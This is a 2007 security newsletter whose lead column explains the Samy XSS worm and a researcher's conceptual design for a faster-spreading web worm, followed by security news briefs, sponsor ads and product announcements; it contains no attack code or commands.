News

Wednesday, June 06, 2007

Is Another Web-Based Super Worm on the Way?

PLEASE VISIT OUR SPONSORS, WHO BRING YOU SECURITY UPDATE FOR FREE:

VeriSign's Extended Validation SSL Certificates

http://list.windowsitpro.com/t?ctl=58F2D:4160B336D0B60CB101BC126490DC23EB

Top Ten Server Virtualization Considerations

http://list.windowsitpro.com/t?ctl=58F38:4160B336D0B60CB101BC126490DC23EB

Protect Info from Phishing and Pharming Exploits

http://list.windowsitpro.com/t?ctl=58F25:4160B336D0B60CB101BC126490DC23EB


=== CONTENTS ===================================================

IN FOCUS: Is Another Web-Based Super Worm on the Way?

NEWS AND FEATURES
- Google Buys GreenBorder, Gains Security Technology
- Mozilla Releases Firefox Updates, Retires Firefox 1.5.0.x
- Spam King Gets Slapped with 35 Criminal Charges
- Recent Security Vulnerabilities

GIVE AND TAKE
- Security Matters Blog: PHP 5.2.3 Coming Soon--RC1 Available Now;
Windows Media Player Plug-In for Firefox
- FAQ: Disable IE Enhanced Security in Windows Server 2008
- From the Forum: Multiple Web Servers Behind One IP address with a
Proxy Server?
- Share Your Security Tips
- Microsoft Learning Paths for Security: Reducing the Challenges and
Complexities of Identity and Access Management

PRODUCTS
- Web Filter Gets Reporting Engine
- Product Evaluations from the Real World

RESOURCES AND EVENTS

FEATURED WHITE PAPER

ANNOUNCEMENTS


=== SPONSOR: VeriSign ==========================================

VeriSign's Extended Validation SSL Certificates
Increase customer confidence at transaction time with the latest
breakthrough in online security--Extended Validation (EV) SSL
Certificates from VeriSign. Extended Validation triggers the address
bar to turn green when a visitor is using Microsoft Internet Explorer 7
and viewing a site with EV SSL Certificates. This green bar lets
customers know that the site they are on is highly authenticated and
secure.
In a recent VeriSign study, 77% of the respondents indicated that
they would be hesitant about shopping at, would check into problems
with, or would abandon a site that once showed EV and no longer did.
Learn more about Extended Validation by reading the technical white
paper: Maximizing Site Visitor Trust Using Extended Validation SSL.

http://list.windowsitpro.com/t?ctl=58F2D:4160B336D0B60CB101BC126490DC23EB


=== IN FOCUS: Is Another Web-Based Super Worm on the Way? ======
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

Over the years, we've seen a number of "super worms." For example,
Nimda, Code Red, and SQL Slammer were devastatingly effective. They
spread quickly, infected a huge number of systems, and cost much money
to eradicate.

Worm technology has certainly evolved, and in many cases it basically
follows the path of least resistance. Since Web technology is dominant
and Ajax (a combination of JavaScript and XML) is being more widely
used every day, it seems rather natural that worms begin to target
those technologies.

In fact, back in 2005, someone created an Ajax-based worm (dubbed Samy)
and turned it loose on MySpace. The worm worked by taking advantage of
the browser when a MySpace user visited a particular MySpace page. The
page loaded JavaScript worm code that used Ajax to spread itself to the
MySpace user's page. And that cycle kept repeating itself. Within 24
hours, Samy had reportedly spread to more than 1 million MySpace pages!
You can read a blow-by-blow description of how the worm worked at this
URL:

http://list.windowsitpro.com/t?ctl=58F3A:4160B336D0B60CB101BC126490DC23EB

Samy took advantage of several problems with Ajax technology, one of
which is the familiar cross-site scripting (XSS) scenario in which a
script from one site interacts with another site. If someone were to
take a worm like Samy further by automating it to contain a longer list
of sites vulnerable to XSS attacks, the effect could be far more
significant. After all, if the Samy worm could infect over 1 million
MySpace sites in only 24 hours, then a worm targeting many different
sites would spread exponentially faster. Furthermore, such a worm could
do a lot more than simply spread itself. It could, for example, easily
be made to steal user credentials and post that information someplace
for an intruder to receive.

Recently, Petko Petkov showed how using a combination of available
technologies would provide the means for a new super worm to be
created. You might know about XSSed.com, a site that aggregates lists
of other sites that contain XSS vulnerabilities. The lists are
presented in an easy-to-parse format and include examples of how to
exploit each XSS vulnerability. Having such a database available online
is useful, even educational, but at the same time, it's a treasure
trove for a malicious coder.

Petkov showed that a new super worm could use XSSed.com as a base and
technologies such as Dapper and Yahoo Pipes to spread itself at
lightning speed. Dapper (at the first URL below) lets people grab
content from nearly any Web site. The content can be automatically
formatted into XML (and other formats). So, effectively, someone can
use Dapper to create a list of sites vulnerable to XSS along with the
sites' associated exploits, all in XML formatted code that a script can
then use for attacks. Yahoo Pipes (at the second URL below) lets the
malicious script obtain a list very quickly on the fly.

http://list.windowsitpro.com/t?ctl=58F3F:4160B336D0B60CB101BC126490DC23EB

http://list.windowsitpro.com/t?ctl=58F3E:4160B336D0B60CB101BC126490DC23EB

With that data and technology available, a worm would spread incredibly
quickly. The problem is compounded by the fact that neither Dapper nor
Yahoo Pipes specifically is necessary for such a worm to work. The
technology provided by those two services could easily be recreated on
any number of sites around the Internet. So stopping such a worm isn't
as simple as it might seem at first. The best defense of course is to
not create Web sites that contain XSS vulnerabilities!

You can read more about Petkov's ideas at the first URL below. The
upcoming Black Hat USA 2007 conference will have at least three
presentations that deal with Web worms (see the second URL below),
including "Attacking Web Service Security: Message Oriented Madness,
XML Worms and Web Service Security Sanity" by Brad Hill; "Premature
Ajax-ulation" by Bryan Sullivan and Billy Hoffman; and "The Little
Hybrid Web Worm that Could" by Billy Hoffman and John Terrill. So if
you're going to Black Hat USA this year (July 28 - August 2 in Las
Vegas), consider attending these presentations.

http://list.windowsitpro.com/t?ctl=58F33:4160B336D0B60CB101BC126490DC23EB

http://list.windowsitpro.com/t?ctl=58F2C:4160B336D0B60CB101BC126490DC23EB


=== SPONSOR: SWSoft ============================================

Top Ten Server Virtualization Considerations
The playing field for server virtualization has become much more
crowded over the last few years. This checklist provides a list of the
main considerations and basic differences between the technologies to
provide a starting point for technology evaluation.

http://list.windowsitpro.com/t?ctl=58F38:4160B336D0B60CB101BC126490DC23EB


=== SECURITY NEWS AND FEATURES =================================

Google Buys GreenBorder, Gains Security Technology
Expanding its security tools further, Google has acquired
GreenBorder Technologies, maker of security tools that protect
browsers, IM clients, and email clients.

http://list.windowsitpro.com/t?ctl=58F30:4160B336D0B60CB101BC126490DC23EB

Mozilla Releases Firefox Updates, Retires Firefox 1.5.0.x
Mozilla Foundation released updates for Firefox that fix five
vulnerabilities present in both the 2.0.0.x and 1.5.0.x versions and
said that unless a serious problem is discovered in the 1.5.0.x series,
no further updates to it will be made available.

http://list.windowsitpro.com/t?ctl=58F2F:4160B336D0B60CB101BC126490DC23EB

Spam King Gets Slapped with 35 Criminal Charges
Robert Alan Solloway, infamous as a prolific spammer, has been
arrested in Seattle and charged with several federal offenses. The
arrest warrant charges Solloway with 35 counts of mail fraud, wire
fraud, email-based fraud, identity theft, and money laundering.

http://list.windowsitpro.com/t?ctl=58F2E:4160B336D0B60CB101BC126490DC23EB

Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security
Alerts, which inform you about recently discovered security
vulnerabilities. You can also find information about these
discoveries at

http://list.windowsitpro.com/t?ctl=58F27:4160B336D0B60CB101BC126490DC23EB


=== SPONSOR: Websense ==========================================

Protect Info from Phishing and Pharming Exploits
Combat phishing and pharming with complete protection against
complex Internet threats by filtering at multiple points on the
gateway, network, and endpoints.

http://list.windowsitpro.com/t?ctl=58F25:4160B336D0B60CB101BC126490DC23EB


=== GIVE AND TAKE ==============================================

SECURITY MATTERS BLOG: PHP 5.2.3 Coming Soon--RC1 Available Now;
Windows Media Player Plug-In for Firefox
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=58F37:4160B336D0B60CB101BC126490DC23EB

PHP 5.2.3 will probably be released in the next week or two unless
major problems are discovered in RC1. Get a link to test RC1 right now;
plus get a link for a Microsoft-developed Windows Media Player (WMP)
plug-in for Mozilla Firefox.

http://list.windowsitpro.com/t?ctl=58F26:4160B336D0B60CB101BC126490DC23EB

FAQ: Disable IE Enhanced Security in Windows Server 2008
by John Savill, http://list.windowsitpro.com/t?ctl=58F35:4160B336D0B60CB101BC126490DC23EB


Q: How do I turn off Internet Explorer Enhanced Security Configuration
in Windows Server 2008?

Find the answer at

http://list.windowsitpro.com/t?ctl=58F31:4160B336D0B60CB101BC126490DC23EB

FROM THE FORUM: Multiple Web Servers Behind One IP Address with a Proxy
Server?
A forum participant writes that he has a cable modem connection with
a domain name mapped to his dynamic IP address. He has multiple Web
servers on his network that he wants to make accessible to the
Internet. When he had only one Web server, he could use port forwarding
to make that site accessible, but now with several servers, he wonders
if he needs to use a proxy server to forward requests to the
appropriate site. He also wonders if an article is available that
details how to set up a Windows Server 2003 machine as a proxy server.

http://list.windowsitpro.com/t?ctl=58F21:4160B336D0B60CB101BC126490DC23EB

SHARE YOUR SECURITY TIPS AND GET $100
Share your security-related tips, comments, or problems and
solutions in Security Pro VIP's Reader to Reader column. Email your
contributions to r2r@securityprovip.com. If we print your submission,
you'll get $100. We edit submissions for style, grammar, and length.

MICROSOFT LEARNING PATHS FOR SECURITY: Reducing the Challenges and
Complexities of Identity and Access Management
Learn how to reduce and control the challenges and complexities of
enterprisewide identity and access management. Gain more control by
providing a single view of a user's identity across the enterprise
through the automation of common tasks. And learn how to use an
integrated approach with smart cards, certificate and password
management, and user provisioning.

http://list.windowsitpro.com/t?ctl=58F32:4160B336D0B60CB101BC126490DC23EB


=== PRODUCTS ===================================================
by Renee Munshi, products@windowsitpro.com

Web Filter Gets Reporting Engine
Barracuda Networks announced the immediate availability of new
reporting capabilities in Barracuda Web Filter firmware 3.2. The
updated firmware adds a set of reports based on criteria such as user
behavior, traffic patterns over time, bandwidth usage, domain requests,
Web site categories and log history and supports PDF, HTML, text, and
CSV output formats. The 3.2 firmware release also lets existing
Barracuda Web Filter customers compile reports on historical Web
traffic. (Barracuda Web Filter can store approximately six months of
Web traffic history.) Barracuda Web Filter customers with current
Energize Updates subscriptions can upgrade to the new firmware release
at no additional charge. For more information, go to

http://list.windowsitpro.com/t?ctl=58F3D:4160B336D0B60CB101BC126490DC23EB

PRODUCT EVALUATIONS FROM THE REAL WORLD
Share your product experience with your peers. Have you discovered a
great product that saves you time and money? Do you use something you
wouldn't wish on anyone? Tell the world! If we publish your opinion,
we'll send you a Best Buy gift card! Send information about a product
you use and whether it helps or hinders you to
whatshot@windowsitpro.com.


=== RESOURCES AND EVENTS =======================================
For more security-related resources, visit

http://list.windowsitpro.com/t?ctl=58F34:4160B336D0B60CB101BC126490DC23EB

Learn how to achieve ROI with your log management system in a matter of
months without costly or daunting investments. Attend this Web seminar
and learn how to ensure that your organization gets the most out of its
log management investment, the key requirements and architectural
differences you need to consider, and the caveats and risks to watch
for when you spec out your requirements and design.

http://list.windowsitpro.com/t?ctl=58F22:4160B336D0B60CB101BC126490DC23EB

Tune in to the hottest network security products by listening to this
exclusive podcast featuring Windows IT Pro Editorial and Strategy
Director Karen Forster and Microsoft's Ian Hameroff. Learn how Network
Access Control (NAC) and Network Access Protection (NAP) work, the
technologies that are involved, and which third-party products are
poised to work with those technologies.

http://list.windowsitpro.com/t?ctl=58F24:4160B336D0B60CB101BC126490DC23EB

Don't miss the 16th USENIX Security Symposium in Boston, August 6-10,
2007. Security '07 offers in-depth training by experts such as Richard
Bejtlich (on TCP/IP Weapons School) and Dan Geer (on measuring
security). The comprehensive technical program includes a keynote
address by Steven Levy, senior editor and columnist at "Newsweek," on
"How the iPod Shuffled the World as We Know It"; 23 refereed papers;
and talks by Gary McGraw and Peter Gutmann. Don't miss the latest
advances in the security of computer systems and networks. Register by
July 16 and save!

http://list.windowsitpro.com/t?ctl=58F3B:4160B336D0B60CB101BC126490DC23EB


=== FEATURED WHITE PAPER =======================================

MSCS clustering can be a good option for local high availability, but
it doesn't completely protect you from unplanned downtime. Download
this free white paper and learn how extending your MSCS cluster offsite
with a high-availability solution that integrates with CDP technology
can protect against data corruption, including damage done by viruses
or human error.

http://list.windowsitpro.com/t?ctl=58F23:4160B336D0B60CB101BC126490DC23EB


=== ANNOUNCEMENTS ==============================================

Scripting Pro VIP--Just Download and Run
Scripting Pro VIP is an online resource that delivers in-depth
articles (with downloadable code!) every week on topics such as ADSI,
ADO, and much more. Subscribers also receive tips, cautionary advice,
direct access to our editors, and a host of other unique benefits!
Order now at an exclusive charter rate and save up to $50!

http://list.windowsitpro.com/t?ctl=58F29:4160B336D0B60CB101BC126490DC23EB

Special Invitation for VIP Access
Become a VIP subscriber and get continuous, inside access to ALL the
content published in Windows IT Pro, SQL Server Magazine, Exchange &
Outlook Pro VIP, Scripting Pro VIP, and Security Pro VIP. Subscribe
now!:

http://list.windowsitpro.com/t?ctl=58F28:4160B336D0B60CB101BC126490DC23EB


================================================================

Security UDPATE is brought to you by the Windows IT Pro Web site's
Security page (first URL below) and Security Pro VIP (second URL
below).

http://list.windowsitpro.com/t?ctl=58F36:4160B336D0B60CB101BC126490DC23EB

http://list.windowsitpro.com/t?ctl=58F3C:4160B336D0B60CB101BC126490DC23EB

Subscribe to Security UPDATE at

http://list.windowsitpro.com/t?ctl=58F2B:4160B336D0B60CB101BC126490DC23EB

Unsubscribe by clicking

http://list.windowsitpro.com/u?id=4160B336D0B60CB101BC126490DC23EB

Be sure to add Security_UPDATE@list.windowsitpro.com
to your antispam software's list of allowed senders.

To contact us:
About Security UPDATE content -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=58F39:4160B336D0B60CB101BC126490DC23EB

About your product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com

View the Windows IT Pro privacy policy at

http://list.windowsitpro.com/t?ctl=58F2A:4160B336D0B60CB101BC126490DC23EB

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2007, Penton Media, Inc. All rights reserved.

No comments:

Blog Archive